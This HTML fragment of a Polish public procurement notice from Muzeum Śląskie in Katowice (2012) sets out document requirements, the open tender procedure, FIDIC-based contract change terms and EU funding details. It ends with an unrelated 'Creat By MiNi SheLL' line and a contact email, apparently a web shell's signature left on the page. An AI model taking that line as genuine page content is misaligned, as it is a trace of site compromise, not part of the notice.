Wszystkie oświadczenia załączane do wniosku muszą być złożone w oryginale i podpisane przez wykonawcę lub osobę przez niego umocowaną. Wszystkie dokumenty załączane do wniosku na potwierdzenie spełniania warunków udziału w postępowaniu, w tym braku podstaw do wykluczenia powinny być złożone w oryginale lub kopii potwierdzonej za zgodność z oryginałem przez wykonawcę lub osobę przez niego umocowaną. W przypadku podpisywania oświadczeń lub dokumentów przez osobę działającą w imieniu wykonawcy, a której uprawnienie do działania w imieniu wykonawcy nie wynika z dokumentów rejestrowych, do wniosku należy załączyć stosowne pełnomocnictwo dla tej osoby złożone w formie oryginału lub kopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej 
z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:

1. Zmiana terminu realizacji przedmiotu umowy  
1.1. patrz FIDIC subklauzula 4.12 - warunki fizyczne
1.2. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
a) patrz FIDIC (warunki szczególne) subklauzula 2.1 - prawo dostępu do Terenu Budowy
b) patrz. FIDIC subklauzule 8.8. i 8.9. - zawieszenie robót i następstwa
c) patrz. FIDIC subklauzula 1.9. - opóźnienie rysunków lub instrukcji
1.3 Zmiany będące następstwem działania organów administracji, w szczególności: przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień;
a) patrz FIDIC (warunki szczególne) subklauzula 1.13 - przestrzeganie prawa

2. Zmiany wynikające ze zmiany stanu prawnego:
2.1. patrz - FIDIC subklauzula 13.7

3. Zmiany osobowe:
3.1. Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnym doświadczeniem i uprawnieniami, o których mowa w ustawie Prawo budowlane oraz, które wymagane były przez Zamawiającego w ogłoszeniu. Zgodnie z zapisami kontraktu.
3.2. Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy.

POWYŻSZE ZMIANY OPISANE W PKT 1 DO 3  NIE GENERUJĄ ZMIANY ZATWIERDZONEJ KWOTY KONTRAKTOWEJ.

4. Zmiany technologiczne, w szczególności:
4.1.   patrz - FIDIC subklauzula 4.12 warunki fizyczne
4.2. konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych zgodnie z założeniami projektu i zasadami wiedzy technicznej .
4.3. konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na brak dostępności wycofanych materiałów i urządzeń lub tych, których produkcja została zaniechana.
4.4. pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy.

Oszacowanie zmian mogących generować zmianę zatwierdzonej kwoty kontraktowej :
Dla wyceny robót wynikających ze zmian zastosowane zostaną te same normy, parametry i standardy oraz poziom cen jak w kosztorysie ofertowym Wykonawcy.
W przypadku wystąpienia robót nie ujętych w wycenionym Wykazie Kwot Ryczałtowych i  Przedmiarze robót Wykonawca będzie stosował ceny materiałów, pracy sprzętu, stawki roboczogodziny Rg, narzuty kosztów pośrednich Kp i zysku Z nie wyższe niż średnie, krajowe, kwartalne ceny obowiązujące w kwartale składania oferty podstawowej, publikowane w wydawnictwie Sekocenbud.
W przypadku materiałów nie ujętych w zeszytach Sekocenbud, do szacowania wartości robót zostanie przyjęta aktualna cena rynkowa na podstawie ofert producentów/dostawców.

5. Pozostałe zmiany:
5.1. zmiana obowiązującej stawki VAT; Zamawiający  zwiększy  wypłacane wynagrodzenie o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę. W przypadku zmiany przepisów dotyczących wysokości  stawki podatku VAT, kwota należna Wykonawcy zostanie wypłacona zgodnie z obowiązującymi stawkami w dniu wystawienia faktury.

Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę.  Nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeumslaskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Śląskie, al. Korfantego 3, 40-005 Katowice
Cena wersji papierowej SIWZ - 500 PLN netto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.11.2012 godzina 12:00, miejsce: Muzeum Śląskie, al. W.Korfantego 3, 40-005 Katowice, sekretariat pok. 107.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie prowadzone w ramach projektu Budowa nowej siedziby Muzeum Śląskiego w Katowicach współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 oraz środków Ministra Kultury i Dziedzictwa Narodowego.
W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż określono w poszczególnych podpunktach pkt. III.3) Ogłoszenia, dane finansowe zostaną przeliczone na PLN według średniego kursu (tabela A) Narodowego Banku Polskiego (NBP) opublikowanego w dniu ukazania się ogłoszenia o niniejszym zamówieniu w  Biuletynie Zamówień Publicznych. Ten sam kurs Zamawiający przyjmie przy przeliczeniu wszelkich innych danych finansowych potwierdzających spełnienie warunków udziału w postępowaniu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com